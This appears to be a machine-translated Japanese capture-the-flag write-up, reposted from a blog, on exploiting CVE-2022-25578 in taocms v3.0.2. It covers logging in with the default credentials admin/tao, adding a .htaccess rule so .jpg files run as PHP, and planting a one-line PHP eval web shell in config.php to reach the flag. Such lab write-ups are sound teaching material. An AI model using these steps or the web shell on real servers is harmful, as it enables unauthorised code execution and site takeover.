春と秋のクラウド環境: CVE-2022-25578 (ファイル同梱)

目次

1. トピック

2.蟻の剣つながり


1. トピック

 導入:

taocms v3.0.2 により、攻撃者は .htaccess ファイルを編集して任意のコードを実行できます

トピックを入力してください

 URL にアクセスし、弱いパスワード(admin/tao)を使用してバックグラウンドでログインします。

背景に入る

 「ファイル管理」をクリックします。

 AddType application/x-httpd-php .jpg を追加して、後でファイルを保存します (jpg ファイルの解析用)

 保存後、ファイル管理に戻ります: 画像をクリックします

.jpg ファイルを作成する

ただし、新しいファイルは空です。

 公式の手順に従って、.htaccess ファイルを編集します。次の内容を追加します: AddType application/x-httpd-php .jpg,

次に写真をアップロードして解析するのですが、実際の運用過程ではアップロードして新規作成することは不可能なので、他の方法をとるしかありません。

この大男はバルフォーカス射撃場でそれを再現しました。研究を参照できます。

Taocms コードインジェクションの脆弱性 (CVE-2022-25578)_taocms 脆弱性_huayimu のブログ - CSDN ブログ

2.蟻の剣つながり

ファイルを変更できるかどうかを確認してください。

config.phpを入力してください

それをトロイの木馬に変更します。

<?php @eval($_POST['wjsc']);?>

 蟻の剣:

 ルート ディレクトリでフラグを表示します。

フラグ{ded865af-fb89-49cb-84ce-f537c33473b2} 

おすすめ

転載: blog.csdn.net/m0_65712192/article/details/130292089